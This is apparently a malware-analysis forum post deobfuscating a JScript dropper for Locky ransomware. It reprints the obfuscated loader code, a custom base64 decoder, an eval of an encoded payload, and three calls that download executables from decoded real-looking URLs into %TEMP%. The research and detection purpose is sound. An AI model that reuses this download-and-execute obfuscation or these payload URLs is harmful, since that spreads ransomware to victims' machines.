Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...
try{
Shtyler4("
http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("
http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("
http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
2)
Look at the end :
try{
Shtyler4("
http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("
http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("
http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

- Using the tool I linked in part (1) :

http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"

My first interrogation when I saw this part : "Why doesn't they put URLs in a as easy to retrieve way ?!".
My second interrogation was "are this real used URLs to download payloads ?!"

This first and third URLs are blocked by KTS cloud
The second exist no more : 403

Because the very interesting part is the deobfuscation from their "chaotic" source, make me curious and make me want to completely deobfuscate it ( to see the real parts used, etc...)

3)
Let's investigate more :)

var sirdallos ="RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz".manysecretthings();

A lot of strange strings are using the same function : manysecretthings();
=> lol, very explicit name they gave it

The most important string used this way, are 8492 chars long

manysecretthings() uses char code BITWISE operations : AND, OR , SHR, SHL
and uses also an array to retrieve the good char code from calculated values : lulalula

String.prototype.manysecretthings = function() {
var c1, c2, c3, c4;
var i, len, out;
var str = this.
replace(/RAPAPIPATA/g, ''); // remove all "RAPAPIPATA" strings
len = str.length; // lenth of the new string
i = 0;
out = "";

while (i < len) { // Principal loop

do {

c1 = lulalula[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);
if (c1 == -1)
break;

var dodo = false;

do {
c2 = lulalula[str.charCodeAt(i++) & 0xff];

dodo = i < len && c2 == -1;
} while (dodo);
if (c2 == -1)
break;
out += String.
fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
do {

c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61)
return out;

c3 = lulalula[c3];
} while (i < len && c3 == -1);
if (c3 == -1)
break;

out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3c) >> 2));
do {

c4 = str.
charCodeAt(i++) & 0xff;

if (c4 == 61)
return out;

c4 = lulalula[c4];

} while (i < len && c4 == -1);

if (c4 == -1)
break;
out += String.
fromCharCode(((c3 & 0x03) << 6) | c4);
} // end of principal while

return out;
// string decrypted
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var lulalulaI, lulalulan = lulalula.length;
for (lulalulaI= 0; lulalulaI < lulalulan; ++lulalulaI) {
lulalula[lulalulaI] = lulalula[lulalulaI] - 5;
}
// here the real values of lulalula are in place :)

Let's test :

var VARDOCF ="JVRFTVAl".manysecretthings();
=> "%TEMP%"

var finde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".manysecretthings();
=> "ActiveXObject"
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
I can't edit more the first post, so I put here the third part

(3) "4 6183943701_01-08-2016.js" ( same method as "7 9329606101_01-08-2016.wsf") :


When first editing this file, the obfuscation method looks interesting
In the spoiler only few parts, to give you an idea
votgorodazaspinoyiputkoroheCCCrodmands.create = function(){
var votgorodazaspinoyiputkoroheCCC
publisher = new votgorodazaspinoyiputkoroheCCCMBJSL.votgorodazaspinoyiputkoroheCCCPublisher();
var votgorodazaspinoyiputkoroheCCC
spyFunction1 = votgorodazaspinoyiputkoroheCCCsinon.votgorodazaspinoyiputkoroheCCCspy();
votgorodazaspinoyiputkoroheCCC
publisher.votgorodazaspinoyiputkoroheCCCsubscribe(votgorodazaspinoyiputkoroheCCCspyFunction1, this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCC
publisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(),
"Function called without arguments");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1,
"PROPER1");
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(
"PROPER1"), "Function called with 'PROPER1' argument");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, [
"PROPER1", "PROPER2"]);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith([
"PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
votgorodazaspinoyiputkoroheCCC
rodmands.votgorodazaspinoyiputkoroheCCCsubtract = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCC
param1.x - votgorodazaspinoyiputkoroheCCCparam2.x, votgorodazaspinoyiputkoroheCCCparam1.y - votgorodazaspinoyiputkoroheCCCparam2.y);
};
var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = {
':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;
function votgorodazaspinoyiputkoroheCCC
achievment(votgorodazaspinoyiputkoroheCCCbidttt){
if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}
else{return 17;}
return 3;};
function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
request = votgorodazaspinoyiputkoroheCCCrivulet;
for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.
replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
return request;
};
var votgorodazaspinoyiputkoroheCCC
chosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
this.
x = x + "bbfgnfgngn";
this.
y = y - "fgnfgngfgf";
};

var votgorodazaspinoyiputkoroheCCClulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);

...
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".votgorodazaspinoyiputkoroheCCCmanysecretthings());

...
votgorodazaspinoyiputkoroheCCCTetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...

try{
votgorodazaspinoyiputkoroheCCCShtyler4(
"http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4(
"http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("
http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

Deobfuscation :

1) simplification :


First thing to do : delete all "votgorodazaspinoyiputkoroheCCC" and "votgorodazaspinoyiputkorohe" parts :

rodmands.create = function(){
var publisher = new MBJSL.
Publisher();
var spyFunction1 = sinon.
spy();
publisher.
subscribe(spyFunction1, this.type1);
publisher.
publish(this.type1);
ok(spyFunction1.
calledWith(), "Function called without arguments");
publisher.publish(this.
type1, "PROPER1");
ok(spyFunction1.
calledWith("PROPER1"), "Function called with 'PROPER1' argument");
publisher.publish(this.
type1, ["PROPER1", "PROPER2"]);
ok(spyFunction1.
calledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
rodmands.
subtract = function(param1, param2) {
return new rodmands(param1.x - param2.x, param1.y - param2.y);
};
var qtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var errant = 0;
function achievment(bidttt){
if(bidttt==1){return 2;}
else{return 17;}
return 3;};
function center(rivulet) {
request = rivulet;
for (var i in qtcnthltqfqrhfq){request = request.replace(i, qtcnthltqfqrhfq);}
return request;
};
var chosen = 33/3-10;
function rodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var d7 = center("00M"+"11SX"+"22ML"+("continues","oxfordshire","inconsolable","gazelle","laundry","2.")+"PIPIPKAM"+"LH"+"TT"+("survival","motif","chaotic","lotus","heritage","places","camera","emacs","P}")+"WU"+("eddie","flustered","exalt","fahrenheit","credit","classroom","trends","cr")+("unbending","ranked","avenue","durable","vestibule","ceremony","elementary","congregate","ip")+"t:S"+("mining","surmount","intimidate","between","croatia","ampland","glenn","municipality","h")+"e"+("voracious","reaper","crispin","count","effeminacy","mashed","convinced","slovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".manysecretthings());

Tetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...
try{
Shtyler4("
http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("
http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("
http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

2) Look at the end :
try{
Shtyler4("
http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("
http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("
http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

=> URLs obfuscation method : unescape Unicode
- Using the tool I linked in part (1) :

http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"

My first interrogation when I saw this part : "Why do they put URLs in an "easy to retrieve way" ?!".
My second interrogation was "are this real used URLs to download payloads ?!"

This first and third URLs are blocked by KTS cloud
The second exist no more : 403

Because the very interesting part is the deobfuscation from their "chaotic" source, it made me curious => I wanted to completely deobfuscate it ( to see the real parts used, etc...)

3 files :
=> %TEMP%\JlLQdKnWwif.exe
=> %TEMP%\bsMnCcz.exe
=> %TEMP%\FgGsqpxH.exe

Exactly the sames files :confused:
Classified as "Heur.AdvML" => Trojan-Ransom.Win32.Locky.bfw (name by Kaspersky)
(encrypted files : .zepto extension)

3) Let's investigate more :) :

var sirdallos ="RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz".manysecretthings();

A lot of strange strings are using the same function : manysecretthings();
=> lol, very explicit name they gave it

The most important string used this way, are 8492 chars long

manysecretthings() uses char code BITWISE operations : AND, OR , SHR, SHL
and uses also an array to retrieve the good char code from calculated values : lulalula
(we will see later that it equivalent to two operations)

String.prototype.manysecretthings = function() {
var c1, c2, c3, c4;
var i, len, out;
var str = this.
replace(/RAPAPIPATA/g, ''); // remove all "RAPAPIPATA" strings
len = str.length; // lenth of the new string
i = 0;
out = "";
while (i < len) {
// Principal loop

do {


c1 = lulalula[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);

if (c1 == -1)
break;

var dodo = false;

do {

c2 = lulalula[str.charCodeAt(i++) & 0xff];

dodo = i < len && c2 == -1;
} while (dodo);

if (c2 == -1)
break;
out += String.
fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
do {

c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61)
return out;

c3 = lulalula[c3];
} while (i < len && c3 == -1);
if (c3 == -1)

break;

out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3c) >> 2));
do {


c4 = str.
charCodeAt(i++) & 0xff;

if (c4 == 61)
return out;

c4 = lulalula[c4];

} while (i < len && c4 == -1);

if (c4 == -1)
break;
out += String.
fromCharCode(((c3 & 0x03) << 6) | c4);
} // end of principal while

return out;
// string decrypted
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var lulalulaI, lulalulan = lulalula.length;
for (lulalulaI= 0; lulalulaI < lulalulan; ++lulalulaI) {
lulalula[lulalulaI] = lulalula[lulalulaI] - 5;
}
// here the real values for lulalula Array are "in place" :)

4) Let's test :

var VARDOCF ="JVRFTVAl".manysecretthings();
=> "%TEMP%"

var finde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".manysecretthings();
=> "ActiveXObject"

Now with the very long string seen above 8492 chars long (a surprise !):


I removed all "votgorodazaspinoyiputkoroheCCC" strings

function rtfta(filePath) {
var Hrosteks=WScript["CreateObject"]("ADODB.Stream");
Hrosteks["
type"]=2;
Hrosteks["
Charset"]=437;
Hrosteks["
open"]();
Hrosteks["
LoadFromFile"](filePath);
var fileString=Hrosteks["
ReadText"];
Hrosteks["
close"]();
return fsta(fileString);
};

function fsta(fileString) {
var t1=new Array();
t1[0xC7]=0x80;
t1[0xFC]=0x81;t1[0xE9]=0x82;t1[0xE2]=0x83;t1[0xE4]=0x84;
.....
.....
t1[0x2248]=0xF7;t1[0xB0]=0xF8;t1[0x2219]=0xF9;t1[0xB7]=0xFA;t1[0x221A]=0xFB;
t1[0x207F]=0xFC;t1[0xB2]=0xFD;t1[0x25A0]=0xFE;t1[0xA0]=0xFF;

var resultArray=new Array();

for (var Tj=0; Tj < fileString["
length"]; Tj++) {
var OVc9=fileString["charCodeAt"](Tj);
if (OVc9 < 128) {

